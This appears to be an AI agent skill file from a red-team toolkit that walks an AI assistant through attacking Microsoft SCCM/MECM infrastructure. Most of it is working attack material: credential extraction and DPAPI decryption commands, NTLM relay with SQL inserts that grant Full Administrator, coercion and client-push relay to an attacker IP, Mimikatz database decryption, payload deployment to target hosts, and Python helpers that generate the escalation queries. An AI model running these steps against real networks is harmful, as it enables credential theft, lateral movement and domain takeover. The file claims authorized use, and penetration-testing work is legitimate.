Enumerates and exploits Microsoft SCCM/MECM (System Center Configuration Manager / Microsoft Endpoint Configuration Manager) infrastructure for credential harvesting, lateral movement, and domain escalation. Covers SCCM enumeration (sccmhunter, SharpSCCM), Network Access Account (NAA) credential extraction (policy request, WMI DPAPI, WMI repository), site server / management point NTLM relay to MSSQL (TAKEOVER-1), client push relay (ELEVATE-2), PXE boot media credential harvesting (CRED-1), SCCM database credential extraction, application deployment for lateral movement, and SCCM share looting.
Install
npx skillscat add blacklanternsecurity/red-run/sccm-exploitation
Install via the SkillsCat registry.
SCCM/MECM Exploitation
You are helping a penetration tester enumerate and exploit Microsoft
SCCM/MECM infrastructure for credential harvesting, lateral movement,
and domain escalation. All testing is under explicit written authorization.
Engagement Logging
Check for ./engagement/ directory. If absent, proceed without logging.
When an engagement directory exists:
- Print
- Print [sccm-exploitation] Activated → <target> to the screen on activation.
- Evidence → save significant output to engagement/evidence/ with
descriptive filenames (e.g., naa-policy-secrets.txt, sccm-pxe-hash.txt).
Do NOT write to engagement/activity.md, engagement/findings.md, or
engagement state. The orchestrator maintains these files. Report all findings
in your return summary.
State Management
Call get_state_summary() from the state-reader MCP server to read current
engagement state. Use it to:
- Skip re-testing targets, parameters, or vulns already confirmed
- Leverage existing credentials or access for this technique
- Understand what's been tried and failed (check Blocked section)
Do NOT write engagement state. When your work is complete, report all
findings clearly in your return summary. The orchestrator parses your summary
and records state changes. Your return summary must include:
- New targets/hosts discovered (with ports and services)
- New credentials or tokens found
- Access gained or changed (user, privilege level, method)
- Vulnerabilities confirmed (with status and severity)
- Pivot paths identified (what leads where)
- Blocked items (what failed and why, whether retryable)
Prerequisites
Access required: Domain user (for enumeration and NAA extraction via
policy request). Local admin on SCCM client (for WMI/DPAPI extraction).
A relay position on the network (for site server / MP relay and client push
relay). Database sysadmin (for database credential extraction). Domain admin
is not a prerequisite for any step; it is an outcome of several of them.
Kerberos authentication setup (for enumeration):
getTGT.py 'DOMAIN.LOCAL/username:password' -dc-ip DC_IP
export KRB5CCNAME=$(pwd)/username.ccache

Tools: sccmhunter, SharpSCCM, MalSCCM, ntlmrelayx.py, PetitPotam,
pxethiefy/PXEThief/SharpPXE, CMLoot, Mimikatz, SQLRecon.
Privileged Commands
Claude Code cannot execute sudo commands. The following require root and
must be handed off to the user:
- pxethiefy.py — PXE boot credential harvesting (crafts DHCP/PXE packets with scapy, needs raw sockets)
- ntlmrelayx.py — NTLM relay to the SCCM site database (binds the privileged ports 445/80 for its SMB/HTTP listeners)
Handoff protocol: Present the full command including sudo, ask the user
to run it, then read the output or wait for callback confirmation.
Non-privileged commands Claude can execute directly:
- Enumeration:
- Enumeration: sccmhunter, SharpSCCM, CMLoot
- Policy extraction: sccmhunter http, sccmhunter show
- Post-exploitation: SQLRecon, MalSCCM, Mimikatz
- Coercion triggers: PetitPotam.py
Step 1: Enumerate SCCM Infrastructure
Discovery via sccmhunter
# Find SCCM infrastructure in the domain
sccmhunter.py find -u 'user' -p 'Password123' -d DOMAIN.LOCAL -dc-ip DC_IP
# Display discovered site servers
sccmhunter.py show -siteservers
# HTTP-based enumeration (no WMI, broader info)
sccmhunter.py http -u 'user' -p 'Password123' -d DOMAIN.LOCAL -dc-ip DC_IP -auto

SharpSCCM (from compromised Windows host)
# Enumerate devices managed by the site (-mp management point, -sc site code)
.\SharpSCCM.exe get devices -mp SCCM01 -sc P01

Unauthenticated MP Endpoints
# Retrieve site signing cert + Unknown Computer GUIDs
curl -s http://MP01.domain.local/SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA | xmllint --format -
# List all management points
curl -s http://MP01.domain.local/SMS_MP/.sms_aut?MPLIST | xmllint --format -
# Get site signing certificate
curl -s http://MP01.domain.local/SMS_MP/.sms_aut?SITESIGNCERT | xmllint --format -

These endpoints are served by the MP without authentication on sites that
still allow HTTP client communication, and reveal the site structure, the
list of management points and the site signing certificate.
Attack Path Decision Tree
SCCM Infrastructure Found
├── Have local admin on SCCM client? → Step 3 (NAA from WMI/DPAPI — quietest)
├── Can create machine account? → Step 2 (NAA via policy request)
├── Can reach MP + MSSQL? → Step 4 (MP relay to MSSQL)
├── Auto client push enabled? → Step 5 (Client push relay)
├── PXE-enabled DP? → Step 6 (PXE boot credential harvesting)
├── Have SCCM admin or DB access? → Step 7 (Database credential extraction)
└── Have SCCM admin? → Step 8 (Application deployment for lateral movement)

Step 2: NAA Extraction via Policy Request (CRED-2)
Extract Network Access Account credentials by requesting machine policy
from the management point. Requires a machine account (real or created).
Create Machine Account + Request Policy
# 1. Create a machine account (the default ms-DS-MachineAccountQuota of 10 lets any domain user do this)
addcomputer.py -computer-name 'fakesccm$' -computer-pass 'Password123!' \
'DOMAIN.LOCAL/user:pass' -dc-ip DC_IP
# 2. Add DNS entry for SCCM server (if not resolving)
echo "SCCM_IP SCCM01 SCCM01.DOMAIN.LOCAL" >> /etc/hosts
# 3. Request policy from MP using fake computer identity (sccmwtf)
python3 sccmwtf.py fake fakepc.domain.local SCCM01 'DOMAIN\fakesccm$' 'Password123!'
# 4. Extract and decrypt NAA credentials from policy XML
cat /tmp/naapolicy.xml | grep 'NetworkAccessUsername\|NetworkAccessPassword' -A 5 \
| grep 'CDATA' | cut -d '[' -f 3 | cut -d ']' -f 1 \
| xargs -I {} python3 policysecretunobfuscate.py {}

SharpSCCM Alternative
# From a compromised host (creates new device registration)
.\SharpSCCM.exe get naa -r newdevice -u fakesccm$ -p 'Password123!'
.\SharpSCCM.exe get secrets -u fakesccm$ -p 'Password123!'

Recovered secrets: NetworkAccessUsername, NetworkAccessPassword, a domain
account the client uses to reach distribution point content when it cannot
use its own computer account (OSD, workgroup clients). The device you
registered stays visible in the SCCM console; record it for cleanup.
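The grep/cut pipeline above and the xxd/xmlstarlet steps in Step 4 do the same job: turn a policy body into XML and pull the obfuscated secret values out of its value elements. The following Python is an added example, not part of this skill or of sccmwtf/PXEThief. It decodes the hex UTF-16 policy body (the "fffe3c003f00..." form MP_GetPolicyBody returns), parses the XML and returns the secret properties by name, failing loudly if a value is not hex. The property/value element layout is assumed from the field names the pipelines above grep for, and the sample policy document is constructed; the values it returns still have to go through policysecretunobfuscate.py or pxethief.py 7.

```python
"""Decode an SCCM policy body and collect its obfuscated secret values.

Added example (not the skill's own code). Assumptions: secrets sit in
<property name="..."><value><![CDATA[hex]]></value></property> elements,
which is the layout the grep/xmlstarlet pipelines in the skill rely on.
"""
import re
import xml.etree.ElementTree as ET

# Property names the skill lists as carrying credentials.
SECRET_PROPERTIES = {
    "NetworkAccessUsername", "NetworkAccessPassword",
    "OSDJoinAccount", "OSDJoinPassword",
}
HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")
XML_DECL_RE = re.compile(r"^\s*<\?xml[^>]*\?>")


def policy_hex_to_xml(policy_hex: str) -> str:
    """Equivalent of `xxd -r -p`: hex -> bytes, then UTF-16 (BOM) -> text."""
    raw = bytes.fromhex(policy_hex.strip())
    if raw[:2] == b"\xff\xfe":
        text = raw.decode("utf-16")        # BOM selects little-endian, BOM is dropped
    else:
        text = raw.decode("utf-8", errors="replace")
    # ElementTree is fed a str, so drop the encoding declaration first.
    return XML_DECL_RE.sub("", text, count=1)


def extract_secret_values(policy_xml: str) -> dict:
    """Return {property name: obfuscated hex value} for every secret property."""
    root = ET.fromstring(policy_xml)
    found = {}
    for prop in root.iter("property"):
        name = prop.get("name")
        if name not in SECRET_PROPERTIES:
            continue
        value = prop.findtext("value", default="").strip()
        # The CDATA wrapper is gone after parsing; make sure what is left is
        # the hex blob and not something unexpected (e.g. an empty value).
        if not HEX_RE.match(value):
            raise ValueError(f"{name}: expected hex, got {value[:16]!r}")
        found[name] = value
    return found


# Constructed sample: a minimal CCM_NetworkAccessAccount instance, encoded the
# way MP_GetPolicyBody hands it back (UTF-16LE with BOM, then hex). The hex
# values are placeholders, not real obfuscated secrets.
SAMPLE_XML = (
    '<?xml version="1.0" encoding="UTF-16"?>'
    '<Policy><instance class="CCM_NetworkAccessAccount">'
    '<property name="NetworkAccessUsername">'
    '<value><![CDATA[8902000000000000]]></value></property>'
    '<property name="NetworkAccessPassword">'
    '<value><![CDATA[89020000DEADBEEF]]></value></property>'
    '<property name="SiteSettingsKey"><value>1</value></property>'
    '</instance></Policy>'
)
SAMPLE_POLICY_HEX = (b"\xff\xfe" + SAMPLE_XML.encode("utf-16-le")).hex()


def demo() -> dict:
    """Run the two steps over the constructed sample."""
    return extract_secret_values(policy_hex_to_xml(SAMPLE_POLICY_HEX))


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}  # next: policysecretunobfuscate.py / pxethief.py 7")
```

Feed each returned value to the deobfuscation tool one at a time; a value that fails the hex check usually means the policy was fetched without the secret being present (for example, no NAA configured), not that the parsing is wrong.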
Step 3: NAA Extraction from Running Client (CRED-3 / CRED-4)
Extract NAA credentials from a compromised SCCM client's local WMI store.
Requires local administrator on the SCCM client.
WMI Query + DPAPI Decryption (CRED-3)
# Query NAA from WMI (DPAPI-encrypted blobs)
Get-WmiObject -Namespace "root\ccm\policy\Machine\ActualConfig" -Class "CCM_NetworkAccessAccount"
# Output: NetworkAccessPassword = <![CDATA[E600000001...]]>
# Decrypt with SharpSCCM (automated)
.\SharpSCCM.exe local secrets -m wmi
# Decrypt with SharpDPAPI (manual)
$str = "<HEX_FROM_WMI_CDATA>" # the hex string inside the CDATA of NetworkAccessPassword (or NetworkAccessUsername)
# Convert the hex string to bytes, two characters at a time
$bytes = for($i=0; $i -lt $str.Length; $i++) {
[byte]::Parse($str.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber); $i++
}
# Drop the 4-byte prefix; what remains is a standard DPAPI blob
$b64 = [Convert]::ToBase64String($bytes[4..$bytes.Length])
# masterkeys.txt must hold the SYSTEM master keys (SharpDPAPI machinemasterkeys, run elevated on this client)
.\SharpDPAPI.exe blob /target:$b64 /mkfile:masterkeys.txt

WMI Repository Search (CRED-4 — Legacy)
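Both the WMI value from CRED-3 and the blobs carved out of OBJECTS.DATA in CRED-4 are DPAPI blobs encrypted under the SYSTEM account's master key, so the first question is which master key file you need before SharpDPAPI can decrypt anything. The following Python is an added example, not part of this skill or of SharpSCCM/SharpDPAPI. It strips the 4-byte prefix the PowerShell above drops, checks the DPAPI provider GUID, reads the master key GUID out of the blob header (the standard DPAPI blob layout: version, provider GUID, master key version, master key GUID, flags) and emits the base64 SharpDPAPI expects as /target. Treating the prefix as a little-endian length of the remainder is an assumption that the code reports rather than depends on; the sample blob is constructed with a made-up master key GUID and filler where the ciphertext would be.

```python
"""Inspect a CCM_NetworkAccessAccount blob before handing it to SharpDPAPI.

Added example (not the skill's own code). The 4-byte prefix is assumed to be
a little-endian length of the DPAPI blob; the header layout after it is the
standard DPAPI blob format.
"""
import base64
import struct
import uuid

# Provider GUID present in every DPAPI blob; its bytes are D08C9DDF0115D111...
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
HEADER_FMT = "<I16sI16sI"            # version, provider, mk version, mk GUID, flags
HEADER_LEN = struct.calcsize(HEADER_FMT)


def parse_ccm_blob(cdata_hex: str) -> dict:
    """Split off the CCM prefix and read the DPAPI header of what follows."""
    raw = bytes.fromhex(cdata_hex.strip())
    if len(raw) < 4 + HEADER_LEN:
        raise ValueError("too short to contain a DPAPI blob header")
    prefix_len = struct.unpack_from("<I", raw, 0)[0]
    blob = raw[4:]
    version, provider_le, mk_version, mk_le, flags = struct.unpack_from(HEADER_FMT, blob, 0)
    provider = uuid.UUID(bytes_le=provider_le)
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError(f"not a DPAPI blob (version={version}, provider={provider})")
    return {
        "length_prefix_matches": prefix_len == len(blob),   # assumption check only
        "masterkey_version": mk_version,
        "masterkey_guid": str(uuid.UUID(bytes_le=mk_le)),  # master key file to collect
        "flags": flags,
        "sharpdpapi_target": base64.b64encode(blob).decode(),
    }


# Constructed sample: 4-byte length prefix, then a DPAPI header with a made-up
# master key GUID, then 32 filler bytes standing in for the rest of the blob.
_SAMPLE_MK = uuid.UUID("0d2a0a58-2b39-4a8f-9a35-4c6b7c1e0f11")
_SAMPLE_BLOB = (
    struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le
    + struct.pack("<I", 1) + _SAMPLE_MK.bytes_le
    + struct.pack("<I", 0) + b"\x00" * 32
)
SAMPLE_CDATA_HEX = (struct.pack("<I", len(_SAMPLE_BLOB)) + _SAMPLE_BLOB).hex().upper()


def demo() -> dict:
    """Parse the constructed sample."""
    return parse_ccm_blob(SAMPLE_CDATA_HEX)


if __name__ == "__main__":
    info = demo()
    print("master key needed:", info["masterkey_guid"])
    print(".\\SharpDPAPI.exe blob /target:" + info["sharpdpapi_target"] + " /mkfile:masterkeys.txt")
```

Collect the master key whose GUID is printed with SharpDPAPI machinemasterkeys from an elevated context on the same client, and pass the resulting key file as /mkfile; a provider GUID mismatch means you copied something other than the CDATA hex.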
# Search WMI repository file for encrypted secrets
.\SharpDPAPI.exe search /type:file /path:C:\Windows\System32\wbem\Repository\OBJECTS.DATA
# SharpSCCM automated disk search
.\SharpSCCM.exe local secrets -m disk

sccmhunter HTTP Method (Remote)
# Remote NAA extraction via HTTP (if accessible)
sccmhunter.py http -u 'admin' -p 'Password' -d DOMAIN.LOCAL -dc-ip DC_IP -auto

Step 4: Site Server / Management Point Relay to MSSQL (TAKEOVER-1)
Coerce NTLM authentication from an SCCM server and relay it to the site
database. Which computer account you coerce decides what you get: the primary
site server's computer account is sysadmin on the site database (TAKEOVER-1),
so relaying it lets you insert yourself as a Full Administrator with the SQL
below. A management point's computer account only holds the smsdbrole_MP
database role, which is enough to call the MP_* stored procedures and pull
OSD policy secrets (the SOCKS section below) but not to write RBAC tables.
The database must live on a different host from the server you coerce; a
server cannot be relayed back to itself.
Prerequisites: Network access to the coerced server and to MSSQL, ability to
coerce authentication (PetitPotam/PrinterBug/DFSCoerce).
Start Relay Listener
# SOCKS proxy mode (for interactive SQL follow-on)
ntlmrelayx.py -ts -t mssql://MSSQL_IP -socks -smb2support
# Direct SQL execution on relay: add yourself as Full Administrator (role SMS0001R). Only works when the relayed account is sysadmin, i.e. you coerced the site server, not an MP
ntlmrelayx.py -smb2support -ts -t mssql://MSSQL_IP -q "USE CM_P01; \
INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) \
VALUES (0x<YOUR_SID_HEX>,'DOMAIN\\your_user',0,0,'','','','','P01'); \
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) \
VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'DOMAIN\\your_user'),'SMS0001R','SMS00ALL','29'); \
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) \
VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'DOMAIN\\your_user'),'SMS0001R','SMS00001','1'); \
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) \
VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'DOMAIN\\your_user'),'SMS0001R','SMS00004','1');"

Coerce Authentication to the Listener
# PetitPotam: make the target (site server for sysadmin, MP for policy secrets) authenticate to the relay listener
python3 PetitPotam.py RELAY_LISTENER_IP TARGET_IP -u user -p pass -d DOMAIN -dc-ip DC_IP

Extract OSD Secrets via SOCKS Proxy
# Connect to MSSQL through the relay SOCKS proxy as the relayed MP computer account
# (smsdbrole_MP is sufficient for the MP_* stored procedures below)
proxychains mssqlclient.py -windows-auth 'DOMAIN/MP01$'@MSSQL_IP

-- Get Unknown Computer GUIDs (there is one Unknown Computer record per architecture)
USE CM_P01;
SELECT SMS_Unique_Identifier0 FROM dbo.UnknownSystem_DISC WHERE DiscArchKey = 2;
-- List policies assigned to Unknown Computer
EXEC MP_GetMachinePolicyAssignments N'<GUID>', N'';
-- Retrieve full policy body
EXEC MP_GetPolicyBody N'{POLICY_ID}', N'2.00';

Decrypt Policy Blob
# Convert hex policy to XML
echo 'fffe3c003f0078...' | xxd -r -p > policy.xml
# Decrypt embedded credential values with PXEthief
# Decrypt the embedded credential values one at a time (pxethief option 7 takes a single hex value)
for v in $(xmlstarlet sel -t -v "//value/text()" policy.xml); do python3 pxethief.py 7 "$v"; done

Recovers: OSDJoinAccount/Password, NetworkAccessUsername/Password, and
other task sequence variable credentials.
sccmhunter Automated MSSQL Path
# Generates the RBAC_Admins / RBAC_ExtendedPermissions inserts above for the target user;
# -stacked emits them as one statement string suitable for ntlmrelayx -q
sccmhunter.py mssql -u user -p pass -d DOMAIN.LOCAL -dc-ip DC_IP \
-tu your_user -sc P01 -stacked

Step 5: Client Push Account Relay (ELEVATE-2)
If automatic site-wide client push is enabled, trigger the SCCM site
server to authenticate as the client push account and relay it.
# 1. Start relay targeting MSSQL (or SMB/LDAP)
ntlmrelayx.py -t mssql://MSSQL_IP -smb2support
# 2. Trigger client push to your IP
.\SharpSCCM.exe invoke client-push -t ATTACKER_IP

The site server treats ATTACKER_IP as a new client and connects to it over
SMB with each configured client push installation account and with its own
computer account. Relay the site server's computer account to the site
database for sysadmin (then run the RBAC inserts from Step 4); relay the push
accounts to SMB on hosts where they are local admin. Relaying SMB-originated
authentication to LDAP generally fails because the SMB client negotiates
signing, so LDAP targets (RBCD, machine account creation) are rarely viable
from this source.
Conditions: Automatic site-wide client push enabled + automatic
device approval + NTLM fallback allowed.
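Steps 4 and 5 both end with a sysadmin relay into the site database, and the RBAC inserts in Step 4 need your user's SID as a 0x hex literal because RBAC_Admins.AdminSID is a binary column. The following Python is an added example, not part of this skill; it does by hand what sccmhunter mssql -stacked generates. It converts an S-1-... SID into the binary SID layout (revision byte, sub-authority count, 48-bit identifier authority big-endian, 32-bit sub-authorities little-endian) and assembles the Step 4 statements into one string for ntlmrelayx -q. Site code, logon name and SID are arguments; the well-known SIDs used to check the encoding (S-1-5-18, S-1-5-32-544) are standard values, not anything from a target.

```python
"""Build the Step 4 RBAC inserts for `ntlmrelayx.py -q` from a SID string.

Added example (not the skill's own code). Role SMS0001R (Full Administrator)
and scopes SMS00ALL / SMS00001 / SMS00004 are the ones the skill already uses.
"""
import struct
import sys


def sid_to_hex(sid: str) -> str:
    """Encode an S-1-... SID string as the binary SID, upper-case hex, no 0x."""
    parts = sid.upper().split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError(f"not a SID: {sid!r}")
    revision = int(parts[1])
    authority = int(parts[2])
    subauths = [int(p) for p in parts[3:]]
    if len(subauths) > 15:
        raise ValueError("a SID holds at most 15 sub-authorities")
    blob = struct.pack("<BB", revision, len(subauths))   # revision, count
    blob += authority.to_bytes(6, "big")                 # identifier authority
    blob += b"".join(struct.pack("<I", s) for s in subauths)
    return blob.hex().upper()


def build_rbac_queries(site_code: str, logon_name: str, sid: str) -> str:
    """Return the USE + INSERT statements as one string for `-q`."""
    if "'" in logon_name or "'" in site_code:
        raise ValueError("quotes are not allowed in logon name or site code")
    admin_sid = sid_to_hex(sid)
    stmts = [
        f"USE CM_{site_code};",
        "INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,"
        "CreatedDate,ModifiedBy,ModifiedDate,SourceSite) "
        f"VALUES (0x{admin_sid},'{logon_name}',0,0,'','','','','{site_code}');",
    ]
    # Full Administrator over all objects, the default security scope and the
    # default collections, matching the three inserts in Step 4.
    for scope_id, scope_type in (("SMS00ALL", 29), ("SMS00001", 1), ("SMS00004", 1)):
        stmts.append(
            "INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) "
            f"VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = '{logon_name}'),"
            f"'SMS0001R','{scope_id}','{scope_type}');"
        )
    return " ".join(stmts)


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit("usage: rbac_queries.py SITE_CODE 'DOMAIN\\user' S-1-5-21-...")
    print(build_rbac_queries(sys.argv[1], sys.argv[2], sys.argv[3]))
```

Get the SID with nxc ldap ... --users or from the user's objectSid, then run ntlmrelayx.py -t mssql://MSSQL_IP -smb2support -q "$(python3 rbac_queries.py P01 'DOMAIN\your_user' S-1-5-21-...)" before triggering the coercion. The backslash in the logon name is literal in T-SQL, so no doubling is needed inside the generated string.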
Step 6: PXE Boot Credential Harvesting (CRED-1)
Extract credentials from PXE-enabled Distribution Points.
pxethiefy (Linux)
# Listen for PXE responses and extract boot variables
sudo python3 pxethiefy.py explore -i eth0
# Downloads the media variables file advertised by the DP; decrypts it when no PXE
# password is set, otherwise prints a hash for cracking

SharpPXE (Windows)
# Send a PXE boot request and download the media variables file via TFTP
.\SharpPXE.exe
# If password-protected: outputs $sccm$aes128$... for cracking

Manual TFTP Download
# TFTP on a PXE-enabled DP is unauthenticated, but the media variables file is not at a
# fixed path: its name (\SMSTemp\<timestamp>.<GUID>.boot.var) is advertised in the DP's
# PXE boot reply, which pxethiefy/PXEThief print
tftp DP01.domain.local
tftp> get \SMSTemp\<timestamp>.<GUID>.boot.var variables.dat
# If password-protected: save the hash to evidence for cracking
# Hash format: $sccm$aes128$...; cracked with the custom hashcat module shipped in the
# PXEThief repository (module 19850 there; it is not an upstream hashcat mode)
cp hash.txt engagement/evidence/sccm-pxe-hash.txt

Do NOT crack hashes in this skill. Save the PXE hash to engagement/evidence/ and return to the orchestrator with the hash file path,
hash type (SCCM PXE media variables file, PXEThief hashcat module 19850), and a routing recommendation to
credential-cracking.
Recovered: Management Point URL, site code, media GUIDs, and, once the media
variables are decrypted, the task sequence policies they unlock, which may
contain task sequence credentials (NAA, OSDJoinAccount).
Step 7: Database Credential Extraction (CRED-5)
Extract all encrypted credentials from the SCCM database's SC_UserAccount
table. Requires sysadmin access to the database (via relay or direct).
Mimikatz (Direct SCCM Decryption)
# Queries SC_UserAccount and decrypts every stored credential. Run it on the primary
# site server: the values are encrypted with the site server's own key, so the
# query succeeds but decryption fails from any other host
mimikatz # misc::sccm /connectionstring:"DRIVER={SQL Server};Trusted=true;DATABASE=CM_P01;SERVER=MSSQL01;"

SQLRecon
# On the site server (same key requirement); WinToken authenticates as the current Windows identity
.\SQLRecon.exe /auth:WinToken /host:MSSQL01 /database:CM_P01 /module:sDecryptCredentials
# Manual extraction (works from anywhere with sysadmin; values come back encrypted)
.\SQLRecon.exe /auth:WinToken /host:MSSQL01 /database:CM_P01 /module:query /command:"SELECT * FROM SC_UserAccount"

Manual Decryption
# Decrypt extracted values with xpn's PoC, also run on the site server where the key lives
sccmdecryptpoc.exe 0C010000080...5D6F0

Step 8: Application Deployment for Lateral Movement
Deploy malicious applications to device collections for code execution
on target machines. Requires SCCM admin access.
MalSCCM (Full Chain)
# 1. Enumerate targets
MalSCCM.exe locate
MalSCCM.exe inspect /computers
# 2. Create device collection
MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
# 3. Add target hosts
MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET01
# 4. Create application (UNC path to payload on SCCMContentLib$)
MalSCCM.exe app /create /name:update /uncpath:"\\SCCM01\SCCMContentLib$\payload.exe"
# 5. Deploy to group
MalSCCM.exe app /deploy /name:update /groupname:TargetGroup /assignmentname:deploy01
# 6. Force immediate checkin
MalSCCM.exe checkin /groupname:TargetGroup
# 7. Cleanup
MalSCCM.exe app /cleanup /name:update
MalSCCM.exe group /delete /groupname:TargetGroup

SharpSCCM (Simpler Execution)
# Direct command execution on device
.\SharpSCCM.exe exec -d TARGET01 -p "C:\Windows\System32\cmd.exe /c whoami > C:\temp\out.txt" -s
# -s runs the command as SYSTEM through the SCCM client; nothing is returned, so redirect output to a file as above

SCCM Share Looting (CMLoot)
# Inventory all files on SCCM shares
Invoke-CMLootInventory -SCCMHost SCCM01.domain.local -Outfile sccmfiles.txt
# Download interesting files
Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi
Invoke-CMLootDownload -SingleFile '\\SCCM01\SCCMContentLib$\DataLib\SC100001.1\x86\config.xml'

SCCMContentLib$ is readable by any domain user by default and may contain
application binaries, task sequence XML with embedded credentials, and
configuration files (install scripts, unattend.xml, and similar files with
hardcoded passwords).
Step 9: Escalate or Pivot
After SCCM exploitation:
- NAA credentials obtained: route to pass-the-hash for lateral movement using
the NAA account (the password is recovered in cleartext; check how far beyond
DP content read access the account actually reaches)
- Task sequence credentials (OSDJoinAccount): route to pass-the-hash or
password-spraying (password reuse)
- SCCM admin achieved: use application deployment (Step 8) to reach
high-value targets, then route to credential-dumping
- Client push account relayed: route to credential-dumping if
DA-level access achieved
- Domain admin via SCCM: route to ad-persistence for maintaining access
Do not write engagement state yourself. Include the following in your return
summary so the orchestrator can record it:
- SCCM infrastructure details (site server, MP, DP, site code)
- Extracted credentials (NAA, task sequence, client push)
- SCCM admin access level
Stall Detection
If you have spent 5 or more tool-calling rounds on the same failure with
no meaningful progress — same error, no new information, no change in output
— stop.
What counts as progress:
- Trying a variant or alternative documented in this skill
- Adjusting syntax, flags, or parameters per the Troubleshooting section
- Gaining new diagnostic information (different error, partial success)
What does NOT count as progress:
- Writing custom exploit code not provided in this skill
- Inventing workarounds using techniques from other domains
- Retrying the same command with trivially different input
- Compiling or transferring tools not mentioned in this skill
If you find yourself writing code that isn't in this skill, you have left
methodology. That is a stall.
Do not loop. Work through failures systematically:
- Try each variant or alternative once
- Check the Troubleshooting section for known fixes
- If nothing works after 5 rounds, you are stalled
When stalled, return to the orchestrator immediately with:
- What was attempted (commands, variants, alternatives tried)
- What failed and why (error messages, empty responses, timeouts)
- Assessment: blocked (permanent — config, patched, missing prereq) or
retry-later (may work with different context, creds, or access)
When stalled: Tell the user you're stalled, present what was tried, and
recommend the next best path. Return findings to the orchestrator — it will
decide whether to revisit with new context or route elsewhere.
Troubleshooting
sccmhunter find Returns Nothing
- Verify LDAP connectivity:
nxc ldap DC_IP -u user -p pass
- SCCM objects may be in a different naming context (the System Management
container under CN=System): try a manual LDAP search for objectClass=mSSMSSite
- Site server may not be published to AD (standalone): scan the network
for port 80/443 on servers and check the /SMS_MP/ endpoint
Policy Request Fails (NAA Extraction)
- Management point may require PKI client certificate — check MP
configuration for "HTTPS only" mode
- Machine account may not be registered: use SharpSCCM to register
a new device identity
- DNS must resolve the MP hostname: add an /etc/hosts entry
Relay to MSSQL Fails
- SMB signing on the MSSQL host does not affect a TDS (mssql://) relay target; it
only matters when you relay to SMB instead. Check it with nxc smb TARGET_IP in that case
- MSSQL may not accept relay: Extended Protection for Authentication
(EPA) blocks relay on SQL Server instances configured with it
- A server cannot be relayed to itself: if the site database is on the site
server, coercing the site server into its own SQL instance fails
- Only the site server's computer account is sysadmin. A relayed MP account
has smsdbrole_MP only, so the RBAC inserts fail and you are limited to the
MP_* procedures; confirm what you got via the SOCKS proxy after the relay
PXE Boot Extraction Fails
- PXE must be enabled on the Distribution Point: check the PXE settings of the
DP role, or the PxeInstalled value under HKLM\Software\Microsoft\SMS\DP on the DP
- Need network reachability on UDP 4011 (ProxyDHCP) and UDP 69 (TFTP). Broadcast
DHCP discovery only works on the DP's broadcast domain; PXEThief option 2 sends
the request to a specific DP IP instead
- If password-protected: extract the hash and route to credential-cracking
(PXEThief's hashcat module, 19850 in that repository)
Application Deployment Not Executing
- The client only picks up new deployments when it polls for policy, and the
default client policy polling interval is 60 minutes. Use
MalSCCM.exe checkin
or trigger the Machine Policy Retrieval & Evaluation Cycle on the target
(SMS_Client TriggerSchedule, schedule {00000000-0000-0000-0000-000000000021})
- Verify device is in the collection:
MalSCCM.exe inspect /groups
- Check SCCM client logs on target: C:\Windows\CCM\Logs\ (PolicyAgent.log,
AppDiscovery.log, AppEnforce.log)
KRB_AP_ERR_SKEW (Clock Skew)
Kerberos requires clocks within 5 minutes of the DC. This is a Clock Skew
Interrupt — stop immediately and return to the orchestrator. Do not retry or
fall back to NTLM. The fix requires root:
sudo ntpdate DC_IP
# or
sudo rdate -n DC_IP

OPSEC Comparison
| Technique | Noise | Detection surface | Prerequisites |
|---|---|---|---|
| SCCM enumeration (sccmhunter find) | Low-Medium | LDAP queries | Domain user |
| MP HTTP endpoint queries | Low | IIS logs | Network access |
| NAA from WMI (CRED-3) | Low | Local execution | Local admin on client |
| NAA from WMI repository (CRED-4) | Low | File access | Local admin on client |
| NAA via policy request (CRED-2) | Medium-High | Machine account creation + MP logs | Domain user |
| SCCM share looting (CMLoot) | Low | SMB access logs | Domain user |
| PXE boot harvesting (CRED-1) | Medium | DHCP/TFTP logs on DP | Network access |
| MP relay to MSSQL (TAKEOVER-1) | High | Coercion + relay + SQL audit | Network position |
| Client push relay (ELEVATE-2) | High | Server logs + auth events | Client push enabled |
| Database extraction (CRED-5) | High | SQL audit logs | DB sysadmin |
| Application deployment | High | Extensive SCCM + client logs | SCCM admin |